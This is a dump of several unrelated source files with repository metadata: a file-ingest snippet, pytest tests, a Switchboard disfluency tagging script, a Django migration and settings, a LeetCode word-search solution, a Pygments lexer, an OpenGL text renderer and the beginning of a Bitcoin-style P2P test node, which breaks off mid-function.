filepath = "%s/%s" % (folder,filename)
ftime = time.gmtime(os.path.getmtime(filepath))
#create date based year and month directories as needed
ctime_dir = "%s/%s" % (str(ftime.tm_year), str(ftime.tm_mon))
dest_dir="%s/%s" % (destdir, ctime_dir)
dest="%s/%s/%s" % (destdir, ctime_dir, filename)
newdest= "%s/%s" % (dest_dir, newfilename)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
if not os.path.exists(dest):
log.info('Ingest - Moving %s from %s to %s' % (ext,filename,dest))
shutil.move(filepath, dest)
else:
log.info("Ingest - Duplicate Name found - new path: %s" % (newdest) )
shutil.move(filepath, newdest)
else:
log.error("Ingest - Source Directory {} doesn't exist".format(sourcedir))
| [
"joel@joeljohnston.us"
] | joel@joeljohnston.us |
ea7f44f012d147d661ff5941b7511a9fb801b9d3 | bb54c528cf1bd4c67bfc12e893df0ef780f7cb53 | /pytestrough/test_rough2.py | 40bbb065dba6cc925e3a00a449b7a9fe71ab5945 | [] | no_license | saurabh-c1/git-pytest | 2f06cf150d211565a1e8054d54b2f93fa6f3a9dd | 360913a8507ab6e1e6bdc1c1479ec76239020fea | refs/heads/main | 2023-06-29T10:23:40.649047 | 2021-08-02T06:55:34 | 2021-08-02T06:55:34 | 391,834,548 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | import pytest
def test_total_divisible_by_6(input_total):
assert input_total % 5 == 0
def test_total_divisible_by_8(input_total):
assert input_total % 9 == 0
| [
"saurabhpubg619@gmail.com"
] | saurabhpubg619@gmail.com |
a844a6abd5e12660cde6c7a1c4e3ce55ba864b6f | af2478883c90a25d6652c382a0cf4c11961ada43 | /sony-egs/swbd_disfluency/switchboard_data/utils/prepare_data_BIO.py | 4d06d491b07e358b694e95ca7dbfb2e6da5ac04b | [] | no_license | sascho1993/asr-disfluency | 75191b3dd3bd8dc8d278fa1195394e9ba4ec7d04 | 37d5f4d3f2f5375916f5818e5f14aeed96c469ed | refs/heads/master | 2022-02-19T02:20:10.112306 | 2019-09-13T00:43:47 | 2019-09-13T00:43:47 | 205,149,095 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,597 | py | #!/usr/bin/env python
"""
The dialogAct corpus is taken as an input token by token.
"""
import re
utts = open("data/raw_text/all_utts_clean_apos","r")
out = open("data/labeled/switchboard_prepared_BIO", "w")
# true if word == '{', false if word == '}'
brace_comment = False
brace_comment_next = False
# true if word == '{D', false if word == '}' and discourse == True
discourse = False
discourse_next = False
# true if word == '{E', false if word == '}' and edit == True
edit = False
edit_next = False
# true if word == '{F', false if word == '}' and filled_pause == True
filled_pause = False
filled_pause_next = False
# true if word == '{C', false if word == '}' and coordinate == True
coordinate = False
coordinate_next = False
# true if word == '{A', false if word == '}' and aside == True
aside = False
aside_next = False
# true if word == '*[[', false if word == ']]' and ignore_ast == True
ignore_ast = False
# true if word == '<+', false if word == '+>' and ignore_plus_comment == True
ignore_plus_comment = False
# true if word == '<<', false if word == '>>' and ignore_noise == True
ignore_noise = False
reparandum = False
repair = False
beginning_edit = False
ip = False
# Count number of open brackets and number of pluses, they both get decreased when ']' is encountered.
# Both counts have to be zero again when beginning a new file
count = 0
plus_count = 0
ignore = ["-", "--", "#", "(("]
# slash units
su = ["-/", "/"]
# set to true to output a new line after each slash unit
split_sentence = True
bracket_open = 0
bracket_close = 0
# count words in sentence to enumerate them in output, each sentence starts with 1
word_number = 0
rm_count = 0
rr_count = 0
rm_rr_count = 0
prev_file_id = ""
prev_prev_file_id = ""
prev_utt_number = ""
prev_speaker_turn = ""
first_word = True
for line in utts:
file_id,utt = line.split(" ",1)
utt = utt.strip().split(" ")
speaker_turn = utt[0]
utt_number = utt[1]
# bracket is not closed until the end of the file
if prev_prev_file_id != "" and prev_prev_file_id != prev_file_id and count != 0:
print "Error: count is not zero.\t\t{}\t{}\t{}".format(prev_prev_file_id, prev_file_id, count)
# too many pluses or too little brackets in file
if prev_prev_file_id != "" and prev_prev_file_id != prev_file_id and plus_count != 0:
print "Error: plus count is not zero.\t\t{}\t{}\t{}".format(prev_prev_file_id, prev_file_id, plus_count)
# word count must be 0 at end of a file
if prev_prev_file_id != "" and prev_prev_file_id != prev_file_id and word_number != 0:
print "Error: word_number is not zero in new file.\t\t{}\t{}\t{}".format(prev_prev_file_id, prev_file_id, word_number)
for word in utt[2:]:
word = word.strip(".,?! \n\"")
# The script works with two words at each time step. Skip the first word.
if first_word == True:
prev_word = word
first_word = False
elif prev_word in ignore:
prev_word = word
elif prev_word in su:
if split_sentence == True:
word_number = 0
out.write("\n")
prev_word = word
else:
prev_word = word
elif re.match('<(/?[A-Z]*[a-z]*_?\-?[a-z]*\.?)+>', prev_word):
prev_word = word
#markers open
elif prev_word == "{D":
discourse = True
prev_word = word
elif prev_word == "{E":
edit = True
prev_word = word
elif prev_word == "{F":
filled_pause = True
prev_word = word
elif prev_word == "{C":
coordinate = True
prev_word = word
elif prev_word == "{A":
aside = True
prev_word = word
elif word == "{":
brace_comment = True
# comments like *[[ slash error ]]
elif prev_word == "*[[":
ignore_ast = True
prev_word = word
elif ignore_ast == True and prev_word != "]]":
prev_word = word
elif ignore_ast == True and prev_word == "]]":
ignore_ast = False
prev_word = word
elif re.match('\]\].*', prev_word) and ignore_ast == False:
print "Error: ignore_ast is already False.\t\tfile_id: {}\tspeaker_turn: {}".format(prev_file_id, speaker_turn)
prev_word = word
# comments like << faint >>
elif prev_word == "<<":
ignore_noise = True
prev_word = word
elif prev_word == ">>":
ignore_noise = False
prev_word = word
elif ignore_noise == True:
prev_word = word
# comments like <+ What to do about x +>
elif prev_word == "<+":
ignore_plus_comment = True
prev_word = word
elif prev_word == "+>":
ignore_plus_comment = False
prev_word = word
elif ignore_plus_comment == True:
prev_word = word
# disfluencies open
elif prev_word == "[":
reparandum = True
count += 1
bracket_open += 1
if repair == False:
beginning_edit = True
prev_word = word
elif prev_word == "+" and count > 1:
repair = True
plus_count += 1
if count == plus_count:
reparandum = False
prev_word = word
elif prev_word == "+" and count == 1:
repair = True
reparandum = False
plus_count += 1
prev_word = word
elif prev_word == "+" and count == 0:
print "Error: count is 0 when encountering +.\t\tfile_id: {}\tspeaker_turn: {}".format(file_id, speaker_turn)
prev_word = word
# disfluencies close
elif prev_word == "]" and count > 1:
count -= 1
plus_count -= 1
bracket_close += 1
if count != plus_count:
repair = False
else:
repair = True
prev_word = word
elif prev_word == "]" and count == 1:
count -= 1
plus_count -= 1
repair = False
bracket_close += 1
prev_word = word
elif prev_word == "]" and count == 0:
print "Error: word is ] when count is already 0.\t\tfile_id: {}\tspeaker_turn: {}".format(file_id, speaker_turn)
prev_word = word
elif prev_word == "+]" and count == 1:
count -= 1
reparandum = False
bracket_close += 1
prev_word = word
elif prev_word == "+]" and count == 0:
print "Error: word is +] when count is already 0\t\tfile_id: {}\tspeaker_turn: {}".format(file_id, speaker_turn)
prev_word = word
elif prev_word == "+]" and count > 1:
count -= 1
bracket_close += 1
if count == plus_count:
reparandum = False
prev_word = word
# check which attributes the word has
elif prev_word != "":
if discourse + edit + filled_pause + coordinate > 1:
print "Error: more than one marker is activated.\t\t{} {}\t{}\t{}".format(prev_file_id, prev_speaker_turn, prev_utt_number, prev_word)
prev_word = word
# skip } as a word to be investigated in order to make BE_IP detectable:
# [ {C and } + {C and } ]
elif word == "))":
pass
elif word == "}":
if discourse == True:
discourse_next = True
elif edit == True:
edit_next = True
elif filled_pause == True:
filled_pause_next = True
elif coordinate == True:
coordinate_next = True
elif aside == True:
aside_next = True
elif brace_comment == True:
brace_comment_next = True
else:
print "Error: marker closed when none was open.\t\tfile_id: {}\tspeaker_turn: {}".format(prev_file_id, speaker_turn)
else:
word_number += 1
marker = "D"*discourse + "E"*edit + "F"*filled_pause + "C"*coordinate
rm = int(reparandum == True)
rr = int(repair == True)
if plus_count > count:
print "Error: plus_count > count\t\tfile_id: {}\tspeaker_turn: {}".format(file_id,speaker_turn)
if bracket_open < bracket_close:
print "Error: bracket_open < bracket_close\t\tfile_id: {}\tspeaker_turn: {}".format(file_id,speaker_turn)
if discourse_next == True:
discourse_next = False
discourse = False
elif edit_next == True:
edit_next = False
edit = False
elif filled_pause_next == True:
filled_pause_next = False
filled_pause = False
elif coordinate_next == True:
coordinate_next = False
coordinate = False
elif aside_next == True:
aside_next = False
aside = False
elif brace_comment_next == True:
brace_comment_next = False
brace_comment = False
continue
# flags are turned into BIO tags
if reparandum == False and repair == False:
edit_type = "O"
else:
if beginning_edit == True:
beginning_edit = False
if reparandum == True and repair != True:
if word == "+" or word == "+]":
edit_type = "BE_IP"
else:
edit_type = "BE"
elif reparandum == True and repair == True:
edit_type = "C_IE"
elif repair == True:
print "Error: only repair at edit beginning"
else:
if word == "+" or word == "+]":
if reparandum == True and repair == False:
edit_type = "IP"
elif reparandum == True and repair == True:
edit_type = "C_IP"
else:
if reparandum == True and repair == False:
edit_type = "IE"
elif reparandum == True and repair == True:
if word == "]":
edit_type = "C_IP"
else:
edit_type = "C_IE"
elif repair == True:
edit_type = "C"
out.write("{}\t{}\t{}\t{}\t{}\t{}\t{}\n".format(str(word_number), prev_file_id, prev_speaker_turn, prev_utt_number, prev_word.lower(), edit_type, marker))
prev_word = word
else:
prev_word = word
prev_prev_file_id = prev_file_id
prev_file_id = file_id
prev_utt_number = utt_number
prev_speaker_turn = speaker_turn
utts.close()
out.close()
| [
"sarah.schopper@sony.com"
] | sarah.schopper@sony.com |
72ecb3e1df744f2155f19fcb8e4ff558b31de014 | e9987d8b88c39c56281c9553142c3a36c66086c5 | /mysite/search/migrations/0002_milestone_b_data.py | db317fc750a6c2aeaf6980ef8bf5b89b35116a15 | [] | no_license | rafpaf/OpenHatch | 43efad73a9cd7d913285e431ce5a021a1f0cb234 | 2f84ee1d572bb07cbd27e755ecfe786bc09effe1 | refs/heads/master | 2016-09-05T14:47:14.654445 | 2010-06-11T17:20:56 | 2010-06-11T17:23:30 | 687,353 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,093 | py |
from south.db import db
from django.db import models
from mysite.search.models import *
class Migration:
    """South schema migration: add the milestone-B data columns to the
    search_bug and search_project tables."""

    def forwards(self, orm):
        """Apply the migration: add each new column in order."""
        new_columns = [
            ('search_bug', 'submitter_realname', models.CharField(max_length=200)),
            ('search_project', 'icon_url', models.URLField(max_length=200)),
            ('search_bug', 'last_touched', models.DateField()),
            ('search_bug', 'importance', models.CharField(max_length=200)),
            ('search_bug', 'people_involved', models.IntegerField()),
            ('search_bug', 'last_polled', models.DateField()),
            ('search_bug', 'submitter_username', models.CharField(max_length=200)),
        ]
        for table, column, field in new_columns:
            db.add_column(table, column, field)

    def backwards(self, orm):
        """Revert the migration: drop the same columns."""
        dropped_columns = [
            ('search_bug', 'submitter_realname'),
            ('search_project', 'icon_url'),
            ('search_bug', 'last_touched'),
            ('search_bug', 'importance'),
            ('search_bug', 'people_involved'),
            ('search_bug', 'last_polled'),
            ('search_bug', 'submitter_username'),
        ]
        for table, column in dropped_columns:
            db.delete_column(table, column)

    # Frozen model state used by South for introspection.
    models = {
        'search.project': {
            'icon_url': ('models.URLField', [], {'max_length': '200'}),
            'id': ('models.AutoField', [], {'primary_key': 'True'}),
            'language': ('models.CharField', [], {'max_length': '200'}),
            'name': ('models.CharField', [], {'max_length': '200'})
        },
        'search.bug': {
            'description': ('models.TextField', [], {}),
            'id': ('models.AutoField', [], {'primary_key': 'True'}),
            'importance': ('models.CharField', [], {'max_length': '200'}),
            'last_polled': ('models.DateField', [], {}),
            'last_touched': ('models.DateField', [], {}),
            'people_involved': ('models.IntegerField', [], {}),
            'project': ('models.ForeignKey', ['Project'], {}),
            'status': ('models.CharField', [], {'max_length': '200'}),
            'submitter_realname': ('models.CharField', [], {'max_length': '200'}),
            'submitter_username': ('models.CharField', [], {'max_length': '200'}),
            'title': ('models.CharField', [], {'max_length': '200'})
        }
    }

    complete_apps = ['search']
| [
"asheesh@openhatch.org"
] | asheesh@openhatch.org |
a865e9f10130569267073fa37a1314786a38c6bb | 8efd8bcd3945d88370f6203e92b0376ca6b41c87 | /problems1_100/79_ Word_Search.py | 5374317283275085258b340378ccd5eef61390f0 | [] | no_license | Provinm/leetcode_archive | 732ad1ef5dcdfdde6dd5a33522e86f7e24ae2db5 | 3e72dcaa579f4ae6f587898dd316fce8189b3d6a | refs/heads/master | 2021-09-21T08:03:31.427465 | 2018-08-22T15:58:30 | 2018-08-22T15:58:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,465 | py |
'''
Given a 2D board and a word, find if the word exists in the grid.
The word can be constructed from letters of sequentially adjacent cell, where "adjacent" cells are those horizontally or vertically neighboring. The same letter cell may not be used more than once.
For example,
Given board =
[
['A','B','C','E'],
['S','F','C','S'],
['A','D','E','E']
]
word = "ABCCED", -> returns true,
word = "SEE", -> returns true,
word = "ABCB", -> returns false.
'''
class Solution(object):
    """LeetCode 79 'Word Search': decide whether a word can be traced through
    horizontally/vertically adjacent board cells, each cell used at most once.

    Fixes over the previous version: removed a leftover debug print in the
    search loop, removed the unused shared class attribute ``Routes``, and
    replaced the fragile manual ``deep``/``tem`` list-slicing backtracking
    with a standard visited-set depth-first search.
    """

    def exist(self, board, word):
        """Return True if `word` exists in `board`.

        :type board: List[List[str]]
        :type word: str
        :rtype: bool
        """
        if not word:
            # An empty word is trivially present (matches original behavior).
            return True
        if not board or not board[0]:
            return False
        rows, cols = len(board), len(board[0])

        def dfs(row, col, depth, visited):
            # `depth` characters already matched; try to match word[depth] here.
            if depth == len(word):
                return True
            if not (0 <= row < rows and 0 <= col < cols):
                return False
            if (row, col) in visited or board[row][col] != word[depth]:
                return False
            visited.add((row, col))
            found = (dfs(row + 1, col, depth + 1, visited) or
                     dfs(row - 1, col, depth + 1, visited) or
                     dfs(row, col + 1, depth + 1, visited) or
                     dfs(row, col - 1, depth + 1, visited))
            # Backtrack so the cell is reusable on other paths.
            visited.remove((row, col))
            return found

        return any(dfs(r, c, 0, set())
                   for r in range(rows) for c in range(cols))
# Quick manual check of the solver on the classic snake-path example.
solver = Solution()
grid = [["A", "B", "C", "E"],
        ["S", "F", "E", "S"],
        ["A", "D", "E", "E"]]
target = "ABCESEEEFS"
print(solver.exist(grid, target))
"zhouxin@gmail.com"
] | zhouxin@gmail.com |
18028c230886e9e8c2509cb6022d011a13447727 | 59be46f6d65a757e2f52cbaf9ae6f8e13d76b459 | /docs/highlighting.py | 601d1ca08a11871f04a9813e2a4ea95b1f278a8f | [
"MIT"
] | permissive | gitter-badger/jam-1 | fb310c52d0a968c307e41e49ff1050852637c267 | b47f8e8f316b87717b9a94e5bf92c373f3840cfc | refs/heads/master | 2021-01-21T02:46:23.239759 | 2015-06-20T08:52:10 | 2015-06-20T08:52:10 | 37,979,006 | 0 | 0 | null | 2015-06-24T10:48:14 | 2015-06-24T10:48:14 | null | UTF-8 | Python | false | false | 1,889 | py | from pygments.lexer import RegexLexer, bygroups, include, combined
from pygments.token import *
import sphinx
class JamLexer(RegexLexer):
    """Pygments lexer for the Jam language, used to highlight doc examples.

    Fix: the operators list previously contained "~" twice, creating a
    redundant duplicate token rule; the duplicate entry has been removed.
    All other patterns are unchanged.
    """

    name = "Jam"
    aliases = ["jam"]
    filenames = ["*.jm"]

    # Integer literals: digits with optional internal underscores (e.g. 1_000).
    INTEGER_REGEX = "[0-9]([0-9_]*[0-9])?"

    tokens = {
        'root': [
            # Line comments run from '#' to end of line.
            ("#.*?$", Comment),
            include('keywords'),
            include('builtins'),
            include('constants'),
            # Integers, then floats with trailing or leading decimal point.
            (INTEGER_REGEX, Literal.Number),
            ("{0}\.({0})?".format(INTEGER_REGEX), Literal.Number),
            ("({0})?\.{0}".format(INTEGER_REGEX), Literal.Number),
            ("\"(.*)?\"", Literal.String),
            # Parentheses push/pop the lexer state to track nesting.
            ("\(", Text, '#push'),
            ("\)", Text, '#pop'),
            (" ", Text.Whitespace),
            include('operators'),
            ("([a-zA-Z_][a-zA-Z_0-9]*)", Name),
        ],
        'keywords': [(kw, Keyword) for kw in [
            "end",
            "def",
            "class",
            "template",
            "if",
            "elif",
            "else",
            "while",
            "for",
            "in",
            "as",
            "import",
        ]],
        'constants': [(const, Keyword.Constant) for const in [
            "true",
            "false",
            "null",
        ]],
        'builtins': [(builtin, Name.Builtin) for builtin in [
            "print",
        ]],
        'operators': [(op, Operator) for op in [
            "~",
            "!",
            "%",
            "\^",
            "&",
            "&&",
            "\*",
            "\*\*",
            "-",
            "-=",
            "\+",
            "\+=",
            "=",
            "==",
            "!=",
            "\|",
            "\|\|",
            ":",
            "\?",
            "<",
            "<=",
            ">",
            ">=",
            "\.",
            "/",
            "//",
        ]],
    }
| [
"ben.schaaf@gmail.com"
] | ben.schaaf@gmail.com |
0439defe8752fffdbcf6387b54905d6a4105b6d1 | 8235ed1728df3c963d890b28835bd0136bd14b94 | /mysite/settings.py | 1ee1ec79ad2fa830c1b96e0a2f45b321a6106ef1 | [] | no_license | mirjpirj/first_project | 6d6432f9b28a74e1a9bb83b1cd8583f74d5264a2 | 2e333f401158f1bb23c9b11a8b807afe176993a8 | refs/heads/master | 2021-01-13T12:18:51.885869 | 2016-09-24T15:52:47 | 2016-09-24T15:52:47 | 69,110,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,224 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.9.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control -- rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = 'ti11yx5zu6_i*a256j$7-6euullt$^*tf@511je+@+ky!@_md&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
# Standard Django contrib apps plus the project's 'blog' app.
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog'
]
MIDDLEWARE_CLASSES = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# Development default: a local SQLite file alongside the project.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"localchadmin@dhcp-20-44.public.unibe.ch"
] | localchadmin@dhcp-20-44.public.unibe.ch |
35a358b8f5e921d8af7f261da78fb3b3df4cec86 | 56ac2b986f6ed4a13b7cbeede7640d0892a3e27c | /lessons/while-loop.py | 6f6b715b6559bd95d88b5713f9704a228d62328d | [] | no_license | alexeahn/UNC-comp110 | da8b689cebd6a1cda4132b93546465fcf1d25126 | 2e9ab74969375e6cdc1cb5c4d3d75ad4a6652d7c | refs/heads/main | 2023-08-28T20:26:53.299997 | 2021-11-15T00:14:25 | 2021-11-15T00:14:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 306 | py | """An example of while-loop statement"""
# Count from 0 up to (but not including) a user-supplied limit,
# printing the square of each number along the way.
number: int = 0
limit: int = int(input("Count up to, but not including what?"))
while number < limit:
    square: int = number ** 2
    print("The square of " + str(number) + " is " + str(square))
    number += 1
print("Done!")
"alexeahn@ad.unc.edu"
] | alexeahn@ad.unc.edu |
5b47c3c2b52d34c4a77fd8f010eb34f1a1d7b933 | d8fb1264d21134442e2926a318262e9cd6f81241 | /math2d_text.py | d6e29960064a5938eb0ee7272eabefb8de97f5f2 | [
"MIT"
] | permissive | spencerparkin/pyMath2D | 0eb6563cacb89050d479de78a567912593783b39 | 0364afc137fd09f2363b426840c5448aaa5342bd | refs/heads/master | 2022-10-24T17:03:33.175095 | 2022-09-26T07:59:18 | 2022-09-26T07:59:18 | 135,310,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,128 | py | # math2d_text.py
from math2d_aa_rect import AxisAlignedRectangle
from OpenGL.GLUT import *
from OpenGL.GL import *
class TextRenderer(object):
    """Draws text into an axis-aligned rectangle using GLUT stroke fonts."""

    def __init__(self, font=None):
        # Default to the Roman stroke font when no font is supplied.
        self.font = GLUT_STROKE_ROMAN if font is None else font

    def render_text(self, text, rect):
        """Render `text` scaled and positioned to fit inside `rect`."""
        # Total advance width of the string, in stroke-font units.
        total_width = float(sum(glutStrokeWidth(self.font, ord(ch)) for ch in text))

        # Bounding rectangle of the raw text; 119.05 is the stroke font height.
        text_rect = AxisAlignedRectangle()
        text_rect.min_point.x = 0.0
        text_rect.max_point.x = total_width
        text_rect.min_point.y = 0.0
        text_rect.max_point.y = 119.05

        original_height = text_rect.Height()
        text_rect.ExpandToMatchAspectRatioOf(rect)
        height = text_rect.Height()
        scale = rect.Width() / text_rect.Width()

        glPushMatrix()
        try:
            # Vertically center the text within the expanded rectangle.
            glTranslatef(rect.min_point.x, rect.min_point.y + (height - original_height) * 0.5 * scale, 0.0)
            glScalef(scale, scale, 1.0)
            for ch in text:
                glutStrokeCharacter(self.font, ord(ch))
        finally:
            glPopMatrix()
"stparkin@mmm.com"
] | stparkin@mmm.com |
55312ac2de2ac26a3f54ff7cc5391ae286b1dafd | c6d14d4eb5722839e811ad4f6098b10aec917b63 | /qa/rpc-tests/test_framework/mininode.py | a41e2b410ae824ca5d3a18730b0d539856adc4c2 | [
"MIT"
] | permissive | KredsBlockchain/kreds-core | 74603364bc3c515c1064e3073aa7072837a8f643 | 1b549a1489d8e3612ce3087aa3fca70bc3d53786 | refs/heads/master | 2018-12-22T16:20:33.578411 | 2018-11-12T10:35:06 | 2018-11-12T10:35:06 | 120,257,608 | 14 | 16 | MIT | 2018-09-27T22:35:15 | 2018-02-05T05:08:06 | C++ | UTF-8 | Python | false | false | 55,192 | py | #!/usr/bin/env python3
# Copyright (c) 2010 ArtForz -- public domain half-a-node
# Copyright (c) 2012 Jeff Garzik
# Copyright (c) 2010-2016 The Kreds Developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# mininode.py - Kreds P2P network half-a-node
#
# This python code was modified from ArtForz' public domain half-a-node, as
# found in the mini-node branch of http://github.com/jgarzik/pynode.
#
# NodeConn: an object which manages p2p connectivity to a kreds node
# NodeConnCB: a base class that describes the interface for receiving
# callbacks with network messages from a NodeConn
# CBlock, CTransaction, CBlockHeader, CTxIn, CTxOut, etc....:
# data structures that should map to corresponding structures in
# kreds/primitives
# msg_block, msg_tx, msg_headers, etc.:
# data structures that represent network messages
# ser_*, deser_*: functions that handle serialization/deserialization
import struct
import socket
import asyncore
import time
import sys
import random
from .util import hex_str_to_bytes, bytes_to_hex_str
from io import BytesIO
from codecs import encode
import hashlib
from threading import RLock
from threading import Thread
import logging
import copy
from test_framework.siphash import siphash256
# Protocol version before BIP31 (pong replies / ping nonces) took effect.
BIP0031_VERSION = 60000
MY_VERSION = 70014  # past bip-31 for ping/pong
MY_SUBVERSION = b"/python-mininode-tester:0.0.3/"
MY_RELAY = 1 # from version 70001 onwards, fRelay should be appended to version messages (BIP37)
# Maximum number of entries allowed in a single inv message.
MAX_INV_SZ = 50000
# Maximum serialized size of a block's base (non-witness) data, in bytes.
MAX_BLOCK_BASE_SIZE = 1000000
COIN = 100000000 # 1 btc in satoshis
# Service-bit flags advertised in version messages.
NODE_NETWORK = (1 << 0)
NODE_GETUTXO = (1 << 1)
NODE_BLOOM = (1 << 2)
NODE_WITNESS = (1 << 3)
# Keep our own socket map for asyncore, so that we can track disconnects
# ourselves (to workaround an issue with closing an asyncore socket when
# using select)
mininode_socket_map = dict()
# One lock for synchronizing all data access between the networking thread (see
# NetworkThread below) and the thread running the test logic. For simplicity,
# NodeConn acquires this lock whenever delivering a message to to a NodeConnCB,
# and whenever adding anything to the send buffer (in send_message()). This
# lock should be acquired in the thread running the test logic to synchronize
# access to any data shared with the NodeConnCB or NodeConn.
mininode_lock = RLock()
# Serialization/deserialization tools
def sha256(s):
    """Return the single-round SHA-256 digest of bytes `s`."""
    return hashlib.sha256(s).digest()
def ripemd160(s):
    # RIPEMD-160 digest of bytes `s` via hashlib.new(); NOTE(review): on
    # OpenSSL 3 builds that ship ripemd160 only in the "legacy" provider this
    # constructor can raise ValueError -- availability is environment-dependent.
    return hashlib.new('ripemd160', s).digest()
def hash256(s):
    """Double SHA-256 (Bitcoin's standard message hash) of bytes `s`."""
    first_round = sha256(s)
    return sha256(first_round)
def ser_compact_size(l):
    """Serialize the integer `l` in Bitcoin's CompactSize encoding."""
    # Values < 253 fit in a single byte; larger values use a one-byte
    # marker (253/254/255) followed by a 2/4/8-byte little-endian integer.
    if l < 253:
        return struct.pack("B", l)
    if l < 0x10000:
        return struct.pack("<BH", 253, l)
    if l < 0x100000000:
        return struct.pack("<BI", 254, l)
    return struct.pack("<BQ", 255, l)
def deser_compact_size(f):
    """Read a CompactSize-encoded integer from the file-like object `f`."""
    (tag,) = struct.unpack("<B", f.read(1))
    if tag < 253:
        return tag
    # Markers 253/254/255 prefix a 2/4/8-byte little-endian integer.
    fmt, width = {253: ("<H", 2), 254: ("<I", 4), 255: ("<Q", 8)}[tag]
    (value,) = struct.unpack(fmt, f.read(width))
    return value
def deser_string(f):
    """Read a CompactSize-length-prefixed byte string from stream `f`."""
    return f.read(deser_compact_size(f))
def ser_string(s):
    """Serialize bytes `s` as a CompactSize length followed by the raw bytes."""
    length_prefix = ser_compact_size(len(s))
    return length_prefix + s
def deser_uint256(f):
    """Read a 256-bit little-endian integer (eight <I words) from stream `f`."""
    value = 0
    for shift in range(0, 256, 32):
        (word,) = struct.unpack("<I", f.read(4))
        value |= word << shift
    return value
def ser_uint256(u):
    """Serialize integer `u` as 32 little-endian bytes (eight <I words)."""
    return b"".join(struct.pack("<I", (u >> shift) & 0xFFFFFFFF)
                    for shift in range(0, 256, 32))
def uint256_from_str(s):
    """Convert the first 32 bytes of `s` (little-endian) to an integer."""
    words = struct.unpack("<IIIIIIII", s[:32])
    return sum(word << (32 * i) for i, word in enumerate(words))
def uint256_from_compact(c):
    """Expand Bitcoin's 'compact' (nBits) target representation to a full int."""
    exponent = (c >> 24) & 0xFF      # size of the target in bytes
    mantissa = c & 0xFFFFFF          # top three bytes of the target
    return mantissa << (8 * (exponent - 3))
def deser_vector(f, c):
    """Read a CompactSize-prefixed vector of `c` instances from stream `f`."""
    count = deser_compact_size(f)
    items = []
    for _ in range(count):
        obj = c()
        obj.deserialize(f)
        items.append(obj)
    return items
# ser_function_name: Allow for an alternate serialization function on the
# entries in the vector (we use this for serializing the vector of transactions
# for a witness block).
def ser_vector(l, ser_function_name=None):
    """Serialize a list as a CompactSize count followed by each element.

    `ser_function_name` selects an alternate per-element serializer method
    (used e.g. to serialize transactions with their witness data).
    """
    out = ser_compact_size(len(l))
    for item in l:
        if ser_function_name:
            out += getattr(item, ser_function_name)()
        else:
            out += item.serialize()
    return out
def deser_uint256_vector(f):
    """Read a CompactSize-prefixed vector of uint256 values from stream `f`."""
    count = deser_compact_size(f)
    return [deser_uint256(f) for _ in range(count)]
def ser_uint256_vector(l):
    """Serialize a list of integers as CompactSize count + uint256 entries."""
    return ser_compact_size(len(l)) + b"".join(ser_uint256(u) for u in l)
def deser_string_vector(f):
    """Read a CompactSize-prefixed vector of byte strings from stream `f`."""
    count = deser_compact_size(f)
    return [deser_string(f) for _ in range(count)]
def ser_string_vector(l):
    """Serialize a list of byte strings, each with its own CompactSize prefix."""
    return ser_compact_size(len(l)) + b"".join(ser_string(sv) for sv in l)
def deser_int_vector(f):
    """Read a CompactSize-prefixed vector of signed 32-bit ints from stream `f`."""
    count = deser_compact_size(f)
    return [struct.unpack("<i", f.read(4))[0] for _ in range(count)]
def ser_int_vector(l):
